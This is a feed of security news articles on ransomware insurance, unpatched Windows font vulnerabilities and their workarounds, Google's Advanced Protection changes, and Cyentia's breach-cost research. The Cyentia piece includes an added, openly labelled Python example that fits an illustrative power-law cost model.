While protections such as email filters, multi-factor authentication, strong password policies to prevent recycled passwords, and employee training to recognize and report suspicious messages can help thwart phishing, “few of these solutions are broadly implemented,” Beazley Breach Response Services wrote. Similarly, requiring a virtual private network and using IP whitelisting to restrict who can connect via RDP can help mitigate the risks of someone unauthorized getting on the network.

Other recommendations include updating PowerShell to the latest framework and disabling PowerShell where not needed, automated patching of the operating system and web browsers, web filtering, and limiting administrative rights to only IT staff and not regular users.

The insurance industry is in the early stages of assessing risk and figuring out how to write policies for ransomware attacks. The insurer may assist with the forensic investigation, developing a course of action, and negotiating the ransom. The entire point of the insurance policy is to help the company resume normal operations as quickly as possible, said Stephen Boyer, CTO of security ratings company BitSight.

“As soon as possible” is the key phrase. There is a false assumption that paying the ransom immediately restores data and business operations. Paying the ransom only helps with getting the data back, the Briefing said, citing Bill Siegel, CEO of Coveware, a security company which helps victims negotiate with attack groups. According to Siegel, the organization still has to clean the affected systems, remediate the vulnerability which allowed the machine to get infected and to spread through the network.

“The process of remediating and ensuring the network is safe to use often takes much longer than the actual decryption of data,” the Briefing said. “In Coveware’s experience, restoring from backups is always faster than ransom payment as a means to recover even though it may seem like a time-consuming process.”

Paying the ransom isn’t always faster, and while it can be cheaper than restoring from backups, the difference is not always large. Consider the city of Atlanta, which wound up spending at least $2.6 million to restore its systems rather than paying the $52,000 ransom. However, the ransom isn’t the only cost of recovery. The organization still has other expenses, such as paying for the work performed by forensics investigators, costs associated with crisis communications, and overtime for its security and IT staff who cleaned the infection and repaired the vulnerabilities. Organizations that choose to pay the ransom are relying on their insurance providers to help cover the costs.

There is a perception that insurance providers don’t pay out security claims, but that is false, said Stephen Boyer, CEO of security ratings company Bitsight. Most insurance policies cover the costs of cyberattacks for policyholders, especially in cases of BEC scams and ransomware, Boyer said.

It didn’t help matters when various insurance companies declined Merck’s claims relating to costs incurred by NotPetya, classifying the malware as “an act of war.” Within insurance circles, the decision to deny the claims was a controversial one, with some insurers believing that the “act of war” exclusion was used inappropriately, Boyer said.

The Beazley Briefing had a sobering conclusion: “ransomware is not going away any time soon.” The attacks are “far too successful and profitable for cyber criminals to shift course.”

<![CDATA[Decipher Podcast: Wade Baker and David Severski]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-wade-baker-and-david-severski https://duo.com/decipher/decipher-podcast-wade-baker-and-david-severski Mon, 23 Mar 2020 00:00:00 -0400

<![CDATA[Unpatched Windows Flaws Under Active Attack]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/unpatched-windows-flaws-under-active-attack https://duo.com/decipher/unpatched-windows-flaws-under-active-attack Mon, 23 Mar 2020 00:00:00 -0400

Microsoft is warning customers about two newly discovered remote code execution vulnerabilities in the Adobe Type Manager library in Windows that are under active attack right now.

The vulnerabilities affect most of the currently supported versions of Windows desktop and server, and Microsoft has rated the bugs as critical for all of the affected releases. The company said that it is aware of some targeted attacks that are exploiting these vulnerabilities, making them quite dangerous for end users and enterprises. Attackers could exploit the flaws in a couple of ways, including through a simple malicious Office document.

Microsoft is working on patches, but the next scheduled release would not be until April 14.

“Microsoft is aware of limited targeted attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released,” the Microsoft advisory says.

“Two remote code execution vulnerabilities exist in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.”

The Adobe Type Manager is a font-management library that has been in use in macOS and Windows for many years. Although the vulnerabilities are rated critical in all of the affected versions, they may have different outcomes on different versions. For example, on Windows 10 a successful attack would only grant the attacker limited privileges as it would be within the context of an AppContainer sandbox.

Although there is no patch available for these flaws, there are some workarounds that can mitigate the effects of the most dangerous exploits against them. Disabling the Preview and Details panes in Windows Explorer and disabling the WebClient service are useful workarounds.

“Disabling the Preview and Details panes in Windows Explorer prevents the automatic display of OTF fonts in Windows Explorer. While this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability,” the advisory says.

The second mitigation, turning off the WebClient service, provides an even better mitigation of the flaws.

“Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet,” the advisory says.

<![CDATA[New Security Tools Added to Google's Advanced Protection]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/new-security-tools-added-to-googles-advanced-protection https://duo.com/decipher/new-security-tools-added-to-googles-advanced-protection Thu, 19 Mar 2020 00:00:00 -0400

Google is adding a new suite of defensive tools to its Advanced Protection Program to help prevent malicious apps from finding their way onto Android devices.

The Advanced Protection Program is Google’s upgraded security program for higher risk users, such as journalists, activists, and executives, and it includes a number of extra defensive measures. The APP includes the use of hardware security keys for two-factor authentication, better protection against phishing, and additional steps to verify users’ identities during the account recovery process. The program is open to anyone, but it is mainly focused on those higher-risk users.

Today, Google has added several new protections to the program, including the mandatory use of the Play Protect app-scanning capability on any Android device that’s attached to a Google account enrolled in the Advanced Protection Program. Play Protect is the behind-the-scenes system that Google uses to find and remove malicious apps from Android devices. It scans the apps on a device on a regular basis, looking for known malicious apps or apps that have hidden or potentially harmful features or capabilities. The system is optional for most users, but Google is changing that for people in the APP.

“To ensure that people enrolled in our Advanced Protection Program benefit from the added security that Google Play Protect provides, we’re now automatically turning it on for all devices with a Google Account enrolled in Advanced Protection and will require that it remain enabled,” Roman Kirillov, engineering manager for Android security and privacy, said.

In addition to automatically enabling app scanning, Google also is changing which apps can be installed on devices with an Advanced Protection Program account enabled. Unlike iOS, Android typically allows people to install apps from third-party sources outside of the Play Store. That gives people added flexibility and freedom, but it also adds an element of risk, as apps in those third-party stores typically aren’t subject to the same testing and security review that Google performs before approving apps in the Play Store.

“Advanced Protection is committed to keeping harmful apps off of enrolled users’ devices. All apps on the Google Play Store undergo rigorous testing, but apps outside of Google Play can potentially pose a risk to users’ devices. As an added protection, we’re now blocking the majority of these non-Play apps from being installed on any devices with a Google Account enrolled in Advanced Protection,” Kirillov said.

“You can still install non-Play apps through app stores that were pre-installed by the device manufacturer and through Android Debug Bridge. Any apps that you’ve already installed from sources outside of Google Play will not be removed and can still be updated.”

The changes to the Advanced Protection Program begin today, and Google is planning to roll out some additional anti-malware tools in Chrome later this year, as well.

<![CDATA[Use Data, Not Magical Thinking]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/use-data-not-magical-thinking https://duo.com/decipher/use-data-not-magical-thinking Thu, 19 Mar 2020 00:00:00 -0400

It is notoriously difficult to quantify security impact and risk—such as estimating how much money would be saved by deploying a certain security control, or the financial impact in case of a breach or attack. The latest research from Cyentia Institute provides security leaders with a solid starting point to answer some of these questions.

Security leaders need to be able to quantify security risk and rank it in relation to other risks in order to make informed decisions. In the Information Risk Insights Study (IRIS), Cyentia researchers analyzed a dataset, provided by insurance data provider Advisen, spanning tens of thousands of security events over the last decade, to develop models that risk managers can use to make informed decisions about their cyber risk, said David Severski, a senior data scientist at Cyentia.

"We're never going to have perfect information, but we can use information that we have available to make better decisions and not just a finger-in-the-wind type of analysis," said Severski.

Cyentia analyzed organizational risk factors across multiple dimensions, including Fortune 1000 rankings, industry sector, market share, organization size, and annual revenue. The dataset includes both headline-grabbing major incidents and smaller, minor, less costly breaches that don't need to be disclosed and aren't "material enough for annual reports." The advantage of having such a large dataset is that organizations can use industry-tailored models to begin their conversations about the frequency and financial impact of incidents, Severski said. It is also a helpful way to compare an organization’s level of risk with industry peers.

Estimating Breach Costs

Financial losses as a result of a security incident typically run about $200,000, according to the IRIS report. However, 10 percent of breaches exceeded $20 million in losses. This is why IRIS also grouped the datapoints to determine what losses looked like for a "typical" event and an "extreme" event. A large organization experiencing a "typical" security incident should expect losses of about $292,000, while a small-to-medium business would see about $24,000.

Many security leaders rely on a “cost per record” metric in order to estimate losses after a breach. Severski called this practice “flat-out harmful,” as it can result in $1.7 trillion of error due to overestimating and underestimating losses. (The calculation for this can be found in IRIS, Figure 14.)

It is logical that total losses would correlate with the size of the breach, or the number of records compromised, but the data of known incidents and the losses reported for those incidents show that "losses increase by some percentage as the records affected increase exponentially," the IRIS report said. Larger breaches do cost more, "but it’s definitely not a linear relationship," the report's authors wrote.

As part of the analysis, Severski took each known event in the dataset and calculated the "cost-per-record" value. It turns out cost-per-record appears to be higher for smaller breaches. At a certain point, economies of scale, the idea that the per-unit cost of something declines when there is enough of that something, kick in and the cost per record drops to mere pennies for large events. About a quarter of the cases cost $2,5000 per record, which is far more than the $150 figure commonly used in industry calculations. The ransomware attacks against vulnerable MongoDB databases in 2017 came out to $0.0000003 per record in this model.

"A single cost-per-record metric simply doesn’t work and shouldn’t be used," Severski wrote in the report. "It underestimates the cost of smaller events and (vastly) overestimates large events."
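To see why one per-record figure errs in both directions, here is an added Python example (mine, not Cyentia's and not taken from the IRIS report). It assumes a power-law form, loss = c · records^β with β below 1, as a stand-in for the "losses increase by some percentage as records increase exponentially" description; the sample events are constructed values chosen to lie exactly on such a curve, and the $150 flat rate is the industry figure mentioned above. The functions fit the curve on log-log axes, derive the implied cost per record, and locate the one breach size at which the flat rate and the curve agree.

```python
import math

# Constructed sample events (records exposed, reported loss in USD).
# Illustrative values, not IRIS data: they lie on loss = 10^4 * records^0.5
# so the fitted parameters can be checked by hand.
SAMPLE_EVENTS = [
    (100, 100_000),
    (10_000, 1_000_000),
    (1_000_000, 10_000_000),
    (100_000_000, 100_000_000),
]

FIXED_COST_PER_RECORD = 150.0  # the flat industry figure cited in the article


def fit_power_law(events):
    """Least-squares fit of log10(loss) = intercept + slope * log10(records).

    Returns (slope, intercept). A slope below 1 means losses grow more slowly
    than record counts, the non-linear relationship the report describes.
    """
    xs = [math.log10(records) for records, _ in events]
    ys = [math.log10(loss) for _, loss in events]
    n = len(events)
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    sxx = sum((x - mean_x) ** 2 for x in xs)
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    slope = sxy / sxx
    intercept = mean_y - slope * mean_x
    return slope, intercept


def predicted_loss(records, slope, intercept):
    """Loss implied by the fitted power law for a given record count."""
    return 10 ** (intercept + slope * math.log10(records))


def cost_per_record(records, slope, intercept):
    """Per-record cost implied by the model; it falls as breaches grow when slope < 1."""
    return predicted_loss(records, slope, intercept) / records


def fixed_rate_error(records, slope, intercept, rate=FIXED_COST_PER_RECORD):
    """Ratio of the flat-rate estimate (rate * records) to the model's loss.

    Below 1.0 the flat rate underestimates the event; above 1.0 it overestimates.
    """
    return (rate * records) / predicted_loss(records, slope, intercept)


def breakeven_records(slope, intercept, rate=FIXED_COST_PER_RECORD):
    """Record count at which the flat rate and the power law give the same loss.

    Solves rate * N = 10**intercept * N**slope for N.
    """
    return 10 ** ((math.log10(rate) - intercept) / (slope - 1.0))


if __name__ == "__main__":
    slope, intercept = fit_power_law(SAMPLE_EVENTS)
    print(f"fitted: loss ~ 10^{intercept:.2f} * records^{slope:.2f}")
    for records, _ in SAMPLE_EVENTS:
        print(f"{records:>12,} records: model ${predicted_loss(records, slope, intercept):,.0f}, "
              f"${cost_per_record(records, slope, intercept):,.2f}/record, "
              f"flat-rate/model = {fixed_rate_error(records, slope, intercept):.2f}")
    print(f"flat rate and model agree at about {breakeven_records(slope, intercept):,.0f} records")
```

With these constructed inputs the flat rate comes in at roughly a sixth of the modelled loss for a 100-record event and about 150 times the modelled loss for a 100-million-record event, with the two agreeing only around 4,400 records; the exact numbers belong to the assumed curve, but the direction of the two errors is the point the report makes.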

The point is not that organizations don't need to think about the number of exposed records in a breach. Instead of multiplying that number by an arbitrary figure, Wade Baker, partner and co-founder of Cyentia Institute, recommended treating the figure as a probability. An exposure of 1,000 records has a 6 percent chance of exceeding $10 million in losses. A massive breach of 100 million records, on the other hand, has a greater than 50 percent chance of costing at least $10 million in losses.

The researchers also looked at differences across industries and found that government agencies, information services, financial firms, and educational institutions are the most likely to have a breach or attack. That risk could be higher because of the type of information they have—classified documents, intellectual property, financial details, personnel and customer records—but it could also be the fact that these industry sectors tend to be highly connected, with many systems connected to the network and Internet.

Information services and retail sectors show “abnormally high losses that exceed many other sectors by a factor of 10,” the report found.

Construction, agriculture, and mining are on the lowest end of the curve, and that may be because of the difference in the type of technology they rely on.

Size Matters, With a Twist

Based on Advisen data, researchers found that over 60 percent of Fortune 1000 companies experienced at least one cyber incident over the last decade. This makes sense, since larger corporations make bigger targets and are likely to have bigger incidents—and those are the ones that get reported, Baker said.

The likelihood that a Fortune 1000 firm would have an incident was one in four, or 25 percent, in a given year, according to the IRIS data. The likelihood of a Fortune 1000 company having to deal with 10 or more cyber loss events was 3 percent. When the researchers focused on the larger companies—those in the Fortune 250—the likelihood of experiencing an incident was higher, at 50 percent.

Not being a mega-corporation reduces the likelihood dramatically, since smaller companies have a 2 percent probability of having even a single event. One in 1,000 SMBs is likely to experience a breach or similar incident in a given year, and only one in 100,000 will wind up dealing with 10 incidents.

Yes, size matters, but that doesn’t mean SMBs don’t have to worry about an attack or a breach. The likelihood may be low, but as Severski wrote in the report, “There are a lot of SMBs out there.”

And size also matters when it comes to the financial impact, except in reverse. IRIS analyzed incidents to find the cost of a “typical” event and an “extreme” event—those that impacted 3 percent of the organizations. For the Fortune 1000 company, a “typical” event would lead to $750,000 in losses, and an “extreme” event $77 million. For an SMB, a typical event would be about $79,000 in losses and an extreme event would be $8 million.

In terms of actual dollars, the Fortune 1000 company would be the one harder hit, except they also have more revenue to help absorb the loss. For these large organizations, the incident cost for a typical breach was well under 1 percent of annual revenues, according to the IRIS study. In contrast, the incident cost for a typical breach for the SMB was a quarter of annual revenues.

The Fortune 1000 may be writing a larger check, but the SMB is the one that is going to be hurting.

Risk managers and analysts focusing on the cost-per-record would miss the actual impact of the breach. A breach doesn’t necessarily have to mean a business-ending event, but it is a material event the organization has to report. Being able to estimate potential impact and assess anticipated costs will prevent organizations from overspending, and help them make decisions that are actually in line with their risk tolerance, Baker said. Having a realistic cost for a breach is necessary for better planning, and can help guide response after a breach.

Risk isn’t one-size-fits-all, Baker said. Organizations can make better decisions about the risks they face once they take into account factors more than just the size of the incident.